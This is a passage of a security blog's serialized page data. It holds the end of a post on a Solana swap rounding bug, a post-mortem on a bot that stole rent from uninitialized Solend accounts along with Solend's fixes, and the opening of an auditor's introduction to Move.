for",{"type":26,"tag":137,"props":7353,"children":7354},{"style":5584},[7355],{"type":32,"value":5618},{"type":26,"tag":137,"props":7357,"children":7358},{"style":5573},[7359],{"type":32,"value":5623},{"type":26,"tag":137,"props":7361,"children":7362},{"style":5626},[7363],{"type":32,"value":5629},{"type":26,"tag":137,"props":7365,"children":7366},{"style":5590},[7367],{"type":32,"value":5634},{"type":26,"tag":137,"props":7369,"children":7370},{"style":5601},[7371],{"type":32,"value":5639},{"type":26,"tag":137,"props":7373,"children":7374},{"class":5559,"line":5745},[7375,7379,7384,7388,7392],{"type":26,"tag":137,"props":7376,"children":7377},{"style":5590},[7378],{"type":32,"value":6908},{"type":26,"tag":137,"props":7380,"children":7381},{"style":5584},[7382],{"type":32,"value":7383},"        y_prev",{"type":26,"tag":137,"props":7385,"children":7386},{"style":5590},[7387],{"type":32,"value":5593},{"type":26,"tag":137,"props":7389,"children":7390},{"style":5584},[7391],{"type":32,"value":5587},{"type":26,"tag":137,"props":7393,"children":7394},{"style":5601},[7395],{"type":32,"value":5604},{"type":26,"tag":137,"props":7397,"children":7398},{"class":5559,"line":5850},[7399,7403,7408,7412,7416,7420,7424,7428,7432,7436,7440,7444,7448,7452,7456,7460,7464,7468],{"type":26,"tag":137,"props":7400,"children":7401},{"style":5590},[7402],{"type":32,"value":6908},{"type":26,"tag":137,"props":7404,"children":7405},{"style":5584},[7406],{"type":32,"value":7407},"        y",{"type":26,"tag":137,"props":7409,"children":7410},{"style":5590},[7411],{"type":32,"value":5593},{"type":26,"tag":137,"props":7413,"children":7414},{"style":5601},[7415],{"type":32,"value":4625},{"type":26,"tag":137,"props":7417,"children":7418},{"style":5682},[7419],{"type":32,"value":5685},{"type":26,"tag":137,"props":7421,"children":7422},{"style":5601},[7423],{"type":32,"value":165},{"type":26,"tag":137,"props":7425,"children":7426},{"style":5590},[7427],{"type":32,"value":5694},{"type":26,"tag":137,"props":7429,"children":7430},{"style":5584},[7431],{"type":32,"value":193},{"type":26,"tag":137,"props":7433,"children":7434},{"style":5601},[7435],{"type":32,"value":1108},{"type":26,"tag":137,"props":7437,"children":7438},{"style":5626},[7439],{"type":32,"value":277},{"type":26,"tag":137,"props":7441,"children":7442},{"style":5601},[7443],{"type":32,"value":200},{"type":26,"tag":137,"props":7445,"children":7446},{"style":5590},[7447],{"type":32,"value":5715},{"type":26,"tag":137,"props":7449,"children":7450},{"style":5682},[7451],{"type":32,"value":5720},{"type":26,"tag":137,"props":7453,"children":7454},{"style":5601},[7455],{"type":32,"value":165},{"type":26,"tag":137,"props":7457,"children":7458},{"style":5584},[7459],{"type":32,"value":4326},{"type":26,"tag":137,"props":7461,"children":7462},{"style":5601},[7463],{"type":32,"value":200},{"type":26,"tag":137,"props":7465,"children":7466},{"style":5590},[7467],{"type":32,"value":5737},{"type":26,"tag":137,"props":7469,"children":7470},{"style":5601},[7471],{"type":32,"value":5742},{"type":26,"tag":137,"props":7473,"children":7474},{"class":5559,"line":5878},[7475,7479,7483,7488,7492,7496,7500,7504,7508,7512,7516,7520,7524,7528,7532,7536,7540,7544,7548,7552,7556,7560,7564,7568,7572],{"type":26,"tag":137,"props":7476,"children":7477},{"style":5590},[7478],{"type":32,"value":6908},{"type":26,"tag":137,"props":7480,"children":7481},{"style":5590},[7482],{"type":32,"value":5751},{"type":26,"tag":137,"props":7484,"children":7485},{"style":5682},[7486],{"type":32,"value":7487},"checked_div",{"type":26,"tag":137,"props":7489,"children":7490},{"style":5601},[7491],{"type":32,"value":165},{"type":26,"tag":137,"props":7493,"children":7494},{"style":5682},[7495],{"type":32,"value":5765},{"type":26,"tag":137,"props":7497,"children":7498},{"style":5601},[7499],{"type":32,"value":165},{"type":26,"tag":137,"props":7501,"children":7502},{"style":5590},[7503],{"type":32,"value":5694},{"type":26,"tag":137,"props":7505,"children":7506},{"style":5584},[7507],{"type":32,"value":193},{"type":26,"tag":137,"props":7509,"children":7510},{"style":5601},[7511],{"type":32,"value":1108},{"type":26,"tag":137,"props":7513,"children":7514},{"style":5626},[7515],{"type":32,"value":277},{"type":26,"tag":137,"props":7517,"children":7518},{"style":5601},[7519],{"type":32,"value":200},{"type":26,"tag":137,"props":7521,"children":7522},{"style":5590},[7523],{"type":32,"value":5715},{"type":26,"tag":137,"props":7525,"children":7526},{"style":5682},[7527],{"type":32,"value":5720},{"type":26,"tag":137,"props":7529,"children":7530},{"style":5601},[7531],{"type":32,"value":165},{"type":26,"tag":137,"props":7533,"children":7534},{"style":5584},[7535],{"type":32,"value":2832},{"type":26,"tag":137,"props":7537,"children":7538},{"style":5601},[7539],{"type":32,"value":200},{"type":26,"tag":137,"props":7541,"children":7542},{"style":5590},[7543],{"type":32,"value":5715},{"type":26,"tag":137,"props":7545,"children":7546},{"style":5682},[7547],{"type":32,"value":5818},{"type":26,"tag":137,"props":7549,"children":7550},{"style":5601},[7551],{"type":32,"value":165},{"type":26,"tag":137,"props":7553,"children":7554},{"style":5584},[7555],{"type":32,"value":5827},{"type":26,"tag":137,"props":7557,"children":7558},{"style":5601},[7559],{"type":32,"value":200},{"type":26,"tag":137,"props":7561,"children":7562},{"style":5590},[7563],{"type":32,"value":5737},{"type":26,"tag":137,"props":7565,"children":7566},{"style":5601},[7567],{"type":32,"value":200},{"type":26,"tag":137,"props":7569,"children":7570},{"style":5590},[7571],{"type":32,"value":5737},{"type":26,"tag":137,"props":7573,"children":7574},{"style":5601},[7575],{"type":32,"value":5604},{"type":26,"tag":137,"props":7577,"children":7578},{"class":5559,"line":5891},[7579,7583,7587,7591,7595,7599],{"type":26,"tag":137,"props":7580,"children":7581},{"style":5590},[7582],{"type":32,"value":6908},{"type":26,"tag":137,"props":7584,"children":7585},{"style":5610},[7586],{"type":32,"value":5856},{"type":26,"tag":137,"props":7588,"children":7589},{"style":5584},[7590],{"type":32,"value":5587},{"type":26,"tag":137,"props":7592,"children":7593},{"style":5590},[7594],{"type":32,"value":5866},{"type":26,"tag":137,"props":7596,"children":7597},{"style":5584},[7598],{"type":32,"value":7303},{"type":26,"tag":137,"props":7600,"children":7601},{"style":5601},[7602],{"type":32,"value":5875},{"type":26,"tag":137,"props":7604,"children":7605},{"class":5559,"line":5909},[7606,7610,7614,7618,7622,7626,7630,7634,7638,7642,7646,7650,7654,7658,7662,7666,7670,7674,7678,7682,7686,7690,7694],{"type":26,"tag":137,"props":7607,"children":7608},{"style":5590},[7609],{"type":32,"value":356},{"type":26,"tag":137,"props":7611,"children":7612},{"style":5573},[7613],{"type":32,"value":5648},{"type":26,"tag":137,"props":7615,"children":7616},{"style":5601},[7617],{"type":32,"value":4625},{"type":26,"tag":137,"props":7619,"children":7620},{"style":5584},[7621],{"type":32,"value":5657},{"type":26,"tag":137,"props":7623,"children":7624},{"style":5601},[7625],{"type":32,"value":1108},{"type":26,"tag":137,"props":7627,"children":7628},{"style":5584},[7629],{"type":32,"value":5666},{"type":26,"tag":137,"props":7631,"children":7632},{"style":5601},[7633],{"type":32,"value":5671},{"type":26,"tag":137,"props":7635,"children":7636},{"style":5590},[7637],{"type":32,"value":289},{"type":26,"tag":137,"props":7639,"children":7640},{"style":5601},[7641],{"type":32,"value":4625},{"type":26,"tag":137,"props":7643,"children":7644},{"style":5682},[7645],{"type":32,"value":5685},{"type":26,"tag":137,"props":7647,"children":7648},{"style":5601},[7649],{"type":32,"value":165},{"type":26,"tag":137,"props":7651,"children":7652},{"style":5590},[7653],{"type":32,"value":5694},{"type":26,"tag":137,"props":7655,"children":7656},{"style":5584},[7657],{"type":32,"value":193},{"type":26,"tag":137,"props":7659,"children":7660},{"style":5601},[7661],{"type":32,"value":1108},{"type":26,"tag":137,"props":7663,"children":7664},{"style":5626},[7665],{"type":32,"value":277},{"type":26,"tag":137,"props":7667,"children":7668},{"style":5601},[7669],{"type":32,"value":200},{"type":26,"tag":137,"props":7671,"children":7672},{"style":5590},[7673],{"type":32,"value":5715},{"type":26,"tag":137,"props":7675,"children":7676},{"style":5682},[7677],{"type":32,"value":5720},{"type":26,"tag":137,"props":7679,"children":7680},{"style":5601},[7681],{"type":32,"value":165},{"type":26,"tag":137,"props":7683,"children":7684},{"style":5584},[7685],{"type":32,"value":4326},{"type":26,"tag":137,"props":7687,"children":7688},{"style":5601},[7689],{"type":32,"value":200},{"type":26,"tag":137,"props":7691,"children":7692},{"style":5590},[7693],{"type":32,"value":5737},{"type":26,"tag":137,"props":7695,"children":7696},{"style":5601},[7697],{"type":32,"value":5742},{"type":26,"tag":137,"props":7699,"children":7700},{"class":5559,"line":5930},[7701,7705,7709,7713,7717,7721,7725,7729,7733,7737,7741,7745,7749,7753,7757,7761,7765,7769,7773,7777,7781,7785,7789,7793,7797],{"type":26,"tag":137,"props":7702,"children":7703},{"style":5590},[7704],{"type":32,"value":356},{"type":26,"tag":137,"props":7706,"children":7707},{"style":5590},[7708],{"type":32,"value":5751},{"type":26,"tag":137,"props":7710,"children":7711},{"style":5682},[7712],{"type":32,"value":5756},{"type":26,"tag":137,"props":7714,"children":7715},{"style":5601},[7716],{"type":32,"value":165},{"type":26,"tag":137,"props":7718,"children":7719},{"style":5682},[7720],{"type":32,"value":5765},{"type":26,"tag":137,"props":7722,"children":7723},{"style":5601},[7724],{"type":32,"value":165},{"type":26,"tag":137,"props":7726,"children":7727},{"style":5590},[7728],{"type":32,"value":5694},{"type":26,"tag":137,"props":7730,"children":7731},{"style":5584},[7732],{"type":32,"value":193},{"type":26,"tag":137,"props":7734,"children":7735},{"style":5601},[7736],{"type":32,"value":1108},{"type":26,"tag":137,"props":7738,"children":7739},{"style":5626},[7740],{"type":32,"value":277},{"type":26,"tag":137,"props":7742,"children":7743},{"style":5601},[7744],{"type":32,"value":200},{"type":26,"tag":137,"props":7746,"children":7747},{"style":5590},[7748],{"type":32,"value":5715},{"type":26,"tag":137,"props":7750,"children":7751},{"style":5682},[7752],{"type":32,"value":5720},{"type":26,"tag":137,"props":7754,"children":7755},{"style":5601},[7756],{"type":32,"value":165},{"type":26,"tag":137,"props":7758,"children":7759},{"style":5584},[7760],{"type":32,"value":2832},{"type":26,"tag":137,"props":7762,"children":7763},{"style":5601},[7764],{"type":32,"value":200},{"type":26,"tag":137,"props":7766,"children":7767},{"style":5590},[7768],{"type":32,"value":5715},{"type":26,"tag":137,"props":7770,"children":7771},{"style":5682},[7772],{"type":32,"value":5818},{"type":26,"tag":137,"props":7774,"children":7775},{"style":5601},[7776],{"type":32,"value":165},{"type":26,"tag":137,"props":7778,"children":7779},{"style":5584},[7780],{"type":32,"value":5827},{"type":26,"tag":137,"props":7782,"children":7783},{"style":5601},[7784],{"type":32,"value":200},{"type":26,"tag":137,"props":7786,"children":7787},{"style":5590},[7788],{"type":32,"value":5737},{"type":26,"tag":137,"props":7790,"children":7791},{"style":5601},[7792],{"type":32,"value":200},{"type":26,"tag":137,"props":7794,"children":7795},{"style":5590},[7796],{"type":32,"value":5737},{"type":26,"tag":137,"props":7798,"children":7799},{"style":5601},[7800],{"type":32,"value":5604},{"type":26,"tag":137,"props":7802,"children":7803},{"class":5559,"line":5939},[7804,7808,7812,7816,7820,7824],{"type":26,"tag":137,"props":7805,"children":7806},{"style":5590},[7807],{"type":32,"value":356},{"type":26,"tag":137,"props":7809,"children":7810},{"style":5610},[7811],{"type":32,"value":5856},{"type":26,"tag":137,"props":7813,"children":7814},{"style":5584},[7815],{"type":32,"value":5861},{"type":26,"tag":137,"props":7817,"children":7818},{"style":5590},[7819],{"type":32,"value":5866},{"type":26,"tag":137,"props":7821,"children":7822},{"style":5584},[7823],{"type":32,"value":5587},{"type":26,"tag":137,"props":7825,"children":7826},{"style":5601},[7827],{"type":32,"value":5875},{"type":26,"tag":137,"props":7829,"children":7830},{"class":5559,"line":6191},[7831,7836],{"type":26,"tag":137,"props":7832,"children":7833},{"style":5610},[7834],{"type":32,"value":7835},"             break",{"type":26,"tag":137,"props":7837,"children":7838},{"style":5601},[7839],{"type":32,"value":5604},{"type":26,"tag":137,"props":7841,"children":7842},{"class":5559,"line":6208},[7843,7847,7851,7855],{"type":26,"tag":137,"props":7844,"children":7845},{"style":5590},[7846],{"type":32,"value":356},{"type":26,"tag":137,"props":7848,"children":7849},{"style":5601},[7850],{"type":32,"value":5897},{"type":26,"tag":137,"props":7852,"children":7853},{"style":5610},[7854],{"type":32,"value":5902},{"type":26,"tag":137,"props":7856,"children":7857},{"style":5601},[7858],{"type":32,"value":5875},{"type":26,"tag":137,"props":7860,"children":7861},{"class":5559,"line":6225},[7862,7866,7870,7874,7878],{"type":26,"tag":137,"props":7863,"children":7864},{"style":5590},[7865],{"type":32,"value":356},{"type":26,"tag":137,"props":7867,"children":7868},{"style":5584},[7869],{"type":32,"value":5915},{"type":26,"tag":137,"props":7871,"children":7872},{"style":5590},[7873],{"type":32,"value":5593},{"type":26,"tag":137,"props":7875,"children":7876},{"style":5584},[7877],{"type":32,"value":5861},{"type":26,"tag":137,"props":7879,"children":7880},{"style":5601},[7881],{"type":32,"value":5604},{"type":26,"tag":137,"props":7883,"children":7884},{"class":5559,"line":6238},[7885],{"type":26,"tag":137,"props":7886,"children":7887},{"style":5601},[7888],{"type":32,"value":7889},"         }\n",{"type":26,"tag":92,"props":7891,"children":7893},{"id":7892},"closing-thoughts",[7894],{"type":32,"value":7895},"Closing Thoughts",{"type":26,"tag":35,"props":7897,"children":7898},{},[7899],{"type":32,"value":7900},"This is a good example of how messing around and interacting with the ecosystem can lead to unexpected bugs. We found this, not as a result of active security research, but as part of our work in MEV and trading.",{"type":26,"tag":35,"props":7902,"children":7903},{},[7904,7906,7911],{"type":32,"value":7905},"Another interesting takeaway is that ",{"type":26,"tag":84,"props":7907,"children":7908},{},[7909],{"type":32,"value":7910},"fuzzing can give a false sense of security",{"type":32,"value":7912},". Prior to our report, Saber had already deployed comprehensive fuzzers for their swap implementation. A researcher looking at code coverage alone might come to the incorrect conclusion that such extensively fuzzed code couldn't possibly have a vulnerability.",{"type":26,"tag":35,"props":7914,"children":7915},{},[7916,7918,7925],{"type":32,"value":7917},"One can see parallels to traditional security, as with Google Project Zero's ",{"type":26,"tag":41,"props":7919,"children":7922},{"href":7920,"rel":7921},"https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html",[45],[7923],{"type":32,"value":7924},"port-mortem of the NSS overflow",{"type":32,"value":470},{"type":26,"tag":35,"props":7927,"children":7928},{},[7929],{"type":26,"tag":2210,"props":7930,"children":7932},{"alt":7,"src":7931},"/posts/spl-swap/p0.png",[],{"type":26,"tag":35,"props":7934,"children":7935},{},[7936],{"type":32,"value":7937},"A heavily fuzzed method had a trivial buffer overflow due to an arbitrary size limit on the input data. Implict assumptions can often undermine security.",{"type":26,"tag":35,"props":7939,"children":7940},{},[7941],{"type":32,"value":7942},"Especially with regard to onchain programs, it's important to consider what actually is a \"vulnerability\". Getting tokens from nothing is a more obvious example, but more subtle bugs can arise with increasingly complex defi interactions. Economic invariants are much harder to detect than say, memory corruption.",{"type":26,"tag":35,"props":7944,"children":7945},{},[7946],{"type":32,"value":7947},"A comprehensive evaluation of smart contracts relies on a deep understanding of economic implications within the Solana ecosystem.",{"type":26,"tag":7949,"props":7950,"children":7951},"style",{},[7952],{"type":32,"value":7953},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":5412,"depth":5412,"links":7955},[7956,7957,7958,7959],{"id":5488,"depth":5412,"text":5491},{"id":6530,"depth":5412,"text":6533},{"id":6805,"depth":5412,"text":6808},{"id":7892,"depth":5412,"text":7895},"content:blog:2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding.md","blog/2022-04-26-spl-swap-rounding",{"_path":7964,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":7965,"description":7966,"image":7967,"date":7971,"isFeatured":18,"onBlogPage":18,"tags":7972,"body":7973,"_type":5433,"_id":8297,"_source":5435,"_file":8298,"_stem":8299,"_extension":5438},"/blog/2022-08-19-solend-rent-thief","The Story of the Curious Rent Thief","A tale of pickpockets preying on the Solana ecosystem. Read our investigation into the persistent theft of rent from uninitialized accounts. This is the story of the Solend rent thief.",{"src":7968,"width":7969,"height":7970},"/posts/rent-thief/title.jpg",970,826,"2022-08-19",[5450,5451],{"type":23,"children":7974,"toc":8290},[7975,7980,7986,7991,7996,8001,8007,8020,8067,8098,8107,8112,8117,8122,8128,8141,8157,8162,8167,8182,8186,8191,8206,8213,8218,8228,8235,8239,8244,8250,8255,8260,8265,8271,8276],{"type":26,"tag":35,"props":7976,"children":7977},{},[7978],{"type":32,"value":7979},"Recently, there’s been a rent thief. This bot steals money from uninitialized accounts across the Solana ecosystem, claiming and profiting from the rent. The Solend team noticed the bot when it attempted an attack on the new permissionless pools that are being developed (to be clear, funds stored in the main Solend protocol are completely unaffected). Let's dig into how rent thieving works by doing a case study on an attack to one of the permissionless pools.",{"type":26,"tag":92,"props":7981,"children":7983},{"id":7982},"background",[7984],{"type":32,"value":7985},"Background",{"type":26,"tag":35,"props":7987,"children":7988},{},[7989],{"type":32,"value":7990},"To understand how this exploit works, we first have to understand a bit about how rent works in Solana.",{"type":26,"tag":35,"props":7992,"children":7993},{},[7994],{"type":32,"value":7995},"Since accounts can store data that every validator needs to download, Solana charges a certain amount of rent based on the amount of data. However, accounts that have enough for 2 years of rent payments are considered rent-exempt as long as their balance never drops below the threshold. Fortunately, rent is very cheap, so it's not hard to make an account rent-exempt.",{"type":26,"tag":35,"props":7997,"children":7998},{},[7999],{"type":32,"value":8000},"As such, when creating new accounts, most programs will need to transfer some SOL into the new account to make it rent-exempt.",{"type":26,"tag":92,"props":8002,"children":8004},{"id":8003},"the-exploit",[8005],{"type":32,"value":8006},"The Exploit",{"type":26,"tag":35,"props":8008,"children":8009},{},[8010,8012,8018],{"type":32,"value":8011},"New reserves (also known as assets) are added to a Solend pool by calling the ",{"type":26,"tag":130,"props":8013,"children":8015},{"className":8014},[],[8016],{"type":32,"value":8017},"init_reserve",{"type":32,"value":8019}," function, which creates 6 new accounts to store data about the reserve:",{"type":26,"tag":4820,"props":8021,"children":8022},{},[8023,8028,8033,8038,8049,8054],{"type":26,"tag":3430,"props":8024,"children":8025},{},[8026],{"type":32,"value":8027},"reserve detail - stores information about the reserve e.g liquidity mint, mint decimals, oracles, configs, etc.",{"type":26,"tag":3430,"props":8029,"children":8030},{},[8031],{"type":32,"value":8032},"reserve liquidity token account - holds deposited tokens",{"type":26,"tag":3430,"props":8034,"children":8035},{},[8036],{"type":32,"value":8037},"fee receiver token account - account which will receive origination fees on borrows",{"type":26,"tag":3430,"props":8039,"children":8040},{},[8041,8043],{"type":32,"value":8042},"reserve collateral mint account - deposit receipt token, also known as ",{"type":26,"tag":130,"props":8044,"children":8046},{"className":8045},[],[8047],{"type":32,"value":8048},"cTokens",{"type":26,"tag":3430,"props":8050,"children":8051},{},[8052],{"type":32,"value":8053},"reserve collateral token account - holds users' collateral tokens",{"type":26,"tag":3430,"props":8055,"children":8056},{},[8057,8059,8065],{"type":32,"value":8058},"creator collateral token account - creator's ",{"type":26,"tag":130,"props":8060,"children":8062},{"className":8061},[],[8063],{"type":32,"value":8064},"cToken",{"type":32,"value":8066}," account",{"type":26,"tag":35,"props":8068,"children":8069},{},[8070,8072,8077,8079,8084,8086,8091,8093],{"type":32,"value":8071},"Account creation and initialization are ",{"type":26,"tag":762,"props":8073,"children":8074},{},[8075],{"type":32,"value":8076},"usually",{"type":32,"value":8078}," done within the same transactions. However, due to Solana's transaction size limit of 1232 bytes, the creation and initialization of these 6 accounts had to be separated into 2 transactions, creation and initialization. Here's what a call to ",{"type":26,"tag":130,"props":8080,"children":8082},{"className":8081},[],[8083],{"type":32,"value":8017},{"type":32,"value":8085}," is ",{"type":26,"tag":762,"props":8087,"children":8088},{},[8089],{"type":32,"value":8090},"supposed",{"type":32,"value":8092}," to look like:\n",{"type":26,"tag":2210,"props":8094,"children":8097},{"src":8095,"alt":8096},"/posts/rent-thief/transacdiagram.png","drawing",[],{"type":26,"tag":35,"props":8099,"children":8100},{},[8101,8103],{"type":32,"value":8102},"Notice anything amiss? In between the two transactions, the account has rent money but no owner. This is where the rent thief comes in to snatch the account, along with its rent:\n",{"type":26,"tag":2210,"props":8104,"children":8106},{"src":8105,"alt":8096},"/posts/rent-thief/attacktransac.png",[],{"type":26,"tag":35,"props":8108,"children":8109},{},[8110],{"type":32,"value":8111},"Since there was a roughly 40 second (50 slot) window in between the two transactions, such an attack was very consistent.",{"type":26,"tag":35,"props":8113,"children":8114},{},[8115],{"type":32,"value":8116},"Fortunately, rent is relatively cheap so the entire attack only extracts about 0.0082 SOL every iteration (4 token accounts each worth around 0.002 SOL), which is around 28 cents at the time of writing this article.",{"type":26,"tag":35,"props":8118,"children":8119},{},[8120],{"type":32,"value":8121},"Despite this lost cost, this is pretty annoying...",{"type":26,"tag":92,"props":8123,"children":8125},{"id":8124},"example",[8126],{"type":32,"value":8127},"Example",{"type":26,"tag":35,"props":8129,"children":8130},{},[8131,8133,8140],{"type":32,"value":8132},"Let's take a look at ",{"type":26,"tag":41,"props":8134,"children":8137},{"href":8135,"rel":8136},"https://explorer.solana.com/address/2PUTo74Vbt9fXVoTywjTFZNnWGckWS98HnruXvZJaj4N",[45],[8138],{"type":32,"value":8139},"a real attack",{"type":32,"value":470},{"type":26,"tag":35,"props":8142,"children":8143},{},[8144,8151,8153],{"type":26,"tag":41,"props":8145,"children":8148},{"href":8146,"rel":8147},"https://explorer.solana.com/tx/9yon9Av2sBq78bZ92Pa28p8gef5MUEQL3sBLGVzxK3RNGYsN2nLnTrbqS1wMCvJdinKE8CC9SwCuUYuNBwrNFNy",[45],[8149],{"type":32,"value":8150},"Transaction 1",{"type":32,"value":8152},":\n",{"type":26,"tag":2210,"props":8154,"children":8156},{"alt":7,"src":8155},"https://i.imgur.com/xJvIwgc.png",[],{"type":26,"tag":35,"props":8158,"children":8159},{},[8160],{"type":32,"value":8161},"(...more accounts truncated)",{"type":26,"tag":35,"props":8163,"children":8164},{},[8165],{"type":32,"value":8166},"The developer creates a couple accounts and transfers enough SOL for them to be rent-exempt. This took place in slot 136,580,113.",{"type":26,"tag":35,"props":8168,"children":8169},{},[8170,8177,8178],{"type":26,"tag":41,"props":8171,"children":8174},{"href":8172,"rel":8173},"https://explorer.solana.com/tx/22beQSDReFGK4KAgarAz4MbibpxaFHiARd3yaCDZ4wmKSNoTcxmKMp6uRNA2CY4xAAZVZZCDg522aJ7jXftyhtSE",[45],[8175],{"type":32,"value":8176},"Attacker's Transaction",{"type":32,"value":8152},{"type":26,"tag":2210,"props":8179,"children":8181},{"alt":7,"src":8180},"https://i.imgur.com/CpSKuL3.png",[],{"type":26,"tag":35,"props":8183,"children":8184},{},[8185],{"type":32,"value":8161},{"type":26,"tag":35,"props":8187,"children":8188},{},[8189],{"type":32,"value":8190},"As detailed before, the attacker takes ownership of the newly created accounts. This took place in slot 136,580,154, which is 41 slots (29 seconds) after the initial transaction.",{"type":26,"tag":35,"props":8192,"children":8193},{},[8194,8201,8202],{"type":26,"tag":41,"props":8195,"children":8198},{"href":8196,"rel":8197},"https://explorer.solana.com/tx/beYo1YBCa4fQ8swdJchx9s4qtgDQV4oVSEqwAX7UpHan4U4Jsv1oxY2V2ZxE77pBQHzYwV4gCXpDDKTgM7kBT4y",[45],[8199],{"type":32,"value":8200},"Transaction 2",{"type":32,"value":8152},{"type":26,"tag":2210,"props":8203,"children":8205},{"alt":7,"src":8204},"https://i.imgur.com/of0GIdw.png",[],{"type":26,"tag":35,"props":8207,"children":8208},{},[8209],{"type":26,"tag":2210,"props":8210,"children":8212},{"alt":7,"src":8211},"https://i.imgur.com/0STSyv8.png",[],{"type":26,"tag":35,"props":8214,"children":8215},{},[8216],{"type":32,"value":8217},"The developer attempts to take ownership of the account, but it fails with the error \"account or token already in use\" since the attacker took ownership of it. This took place in slot 136,580,167, which is 13 slots (9 seconds) after the attacker's transaction. In total, that's a 54 slot-gap (38 seconds) between the two Solend transactions.",{"type":26,"tag":35,"props":8219,"children":8220},{},[8221,8227],{"type":26,"tag":41,"props":8222,"children":8225},{"href":8223,"rel":8224},"https://explorer.solana.com/tx/3D45bCbbeSEaigz3RX6GRKuoDSok3FHMi5Z2N5HDXcPjqMzu3Qx5iEoXh56RWg1mn7w9ZuZifD91n1DwnPjdaW2G",[45],[8226],{"type":32,"value":8176},{"type":32,"value":7072},{"type":26,"tag":35,"props":8229,"children":8230},{},[8231],{"type":26,"tag":2210,"props":8232,"children":8234},{"alt":7,"src":8233},"https://i.imgur.com/AmSPdmy.png",[],{"type":26,"tag":35,"props":8236,"children":8237},{},[8238],{"type":32,"value":8161},{"type":26,"tag":35,"props":8240,"children":8241},{},[8242],{"type":32,"value":8243},"Now that the attack is over, the attacker closes the accounts, transferring the rent money to themselves. The total money stolen during this attack was 0.00815212 SOL.",{"type":26,"tag":92,"props":8245,"children":8247},{"id":8246},"impact",[8248],{"type":32,"value":8249},"Impact",{"type":26,"tag":35,"props":8251,"children":8252},{},[8253],{"type":32,"value":8254},"Rent-thieving attacks don't steal much money.",{"type":26,"tag":35,"props":8256,"children":8257},{},[8258],{"type":32,"value":8259},"They can only make a small profit very infrequently as Solana rent is cheap and there are only a handful of large services that separate account creation and initialization. In addition, this stratedgy doesn't scale well, since such non-atomic account creation is relatively infrequent.",{"type":26,"tag":35,"props":8261,"children":8262},{},[8263],{"type":32,"value":8264},"However, it's still obnoxious even if the monetary impact is minimal. Transactions will fail and need to be remade, impacting usability.",{"type":26,"tag":92,"props":8266,"children":8268},{"id":8267},"solution",[8269],{"type":32,"value":8270},"Solution",{"type":26,"tag":35,"props":8272,"children":8273},{},[8274],{"type":32,"value":8275},"As a temporary stopgap, Solend refactored their codebase to lower the 40 second delay between transactions to around 15 seconds (20 slots), making an attack much more difficult and inconsistent.",{"type":26,"tag":35,"props":8277,"children":8278},{},[8279,8281,8288],{"type":32,"value":8280},"As a more permenant solution, Solend implemented ",{"type":26,"tag":41,"props":8282,"children":8285},{"href":8283,"rel":8284},"https://explorer.solana.com/tx/3DR74oQh966HbozLPYFqTgCmQWbUNSBkjUcEs7CuWxMPNxM3mBzqH7Gqu1mVRBRxNSTWJBcJkTnCzmoqD6kPYMXE?cluster=devnet",[45],[8286],{"type":32,"value":8287},"an onchain program",{"type":32,"value":8289}," which handles account creation, allowing them to fit all the relevant instructions into one transaction.",{"title":7,"searchDepth":5412,"depth":5412,"links":8291},[8292,8293,8294,8295,8296],{"id":7982,"depth":5412,"text":7985},{"id":8003,"depth":5412,"text":8006},{"id":8124,"depth":5412,"text":8127},{"id":8246,"depth":5412,"text":8249},{"id":8267,"depth":5412,"text":8270},"content:blog:2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief",{"_path":8301,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8302,"description":8303,"author":8304,"image":8305,"date":8309,"isFeatured":18,"onBlogPage":18,"body":8310,"_type":5433,"_id":11845,"_source":5435,"_file":11846,"_stem":11847,"_extension":5438},"/blog/2022-09-06-move-introduction","Move: An Auditor's Introduction","What actually makes Move secure? A discussion of Move's typing system and formal verification.","robert",{"src":8306,"height":8307,"width":8308},"/posts/move-intro/title.jpg",1221,1400,"2022-09-06",{"type":23,"children":8311,"toc":11840},[8312,8317,8322,8341,8347,8359,8458,8466,8585,8593,8615,8768,8773,9031,9052,9086,9091,9111,9116,9127,9139,9351,9363,9377,9390,9647,9659,9881,9886,9914,10060,10079,10084,10349,10361,10366,10379,10385,10390,10395,10407,10421,10426,10525,10537,10550,10824,10829,10841,10846,10900,10920,10925,11809,11813,11818,11823,11836],{"type":26,"tag":35,"props":8313,"children":8314},{},[8315],{"type":32,"value":8316},"As part of our work, we seek to understand how to eliminate vulnerability classes. Designing safer languages enables developers to write code with confidence. How exactly does Move lend itself to safer programming practices? What can we learn from Move to generalize secure design principles for other execution environments?",{"type":26,"tag":35,"props":8318,"children":8319},{},[8320],{"type":32,"value":8321},"Lately, there appears to be many buzzwords floating around. Formal verification, type based safety, \"rust but for blockchain\".",{"type":26,"tag":35,"props":8323,"children":8324},{},[8325,8327,8332,8334,8339],{"type":32,"value":8326},"In this piece I'll seek to discuss exactly ",{"type":26,"tag":762,"props":8328,"children":8329},{},[8330],{"type":32,"value":8331},"how",{"type":32,"value":8333}," move lends itself to more secure programming practices, potential shortcomings, and practical design tips for protocol developers looking to build ",{"type":26,"tag":762,"props":8335,"children":8336},{},[8337],{"type":32,"value":8338},"structurally",{"type":32,"value":8340}," safer programs.",{"type":26,"tag":92,"props":8342,"children":8344},{"id":8343},"types",[8345],{"type":32,"value":8346},"Types",{"type":26,"tag":35,"props":8348,"children":8349},{},[8350,8352,8358],{"type":32,"value":8351},"One of the key selling points of Move is the use of typed resources. Aptos and Sui have slight variations in how they materialize this pattern, but as an example take ",{"type":26,"tag":130,"props":8353,"children":8355},{"className":8354},[],[8356],{"type":32,"value":8357},"coin.move",{"type":32,"value":470},{"type":26,"tag":5512,"props":8360,"children":8362},{"className":5552,"code":8361,"language":5551,"meta":7,"style":7},"  /// Main structure representing a coin/token in an account's custody.\n  struct Coin\u003Cphantom CoinType> has store {\n      /// Amount of coin this address has.\n      value: u64,\n  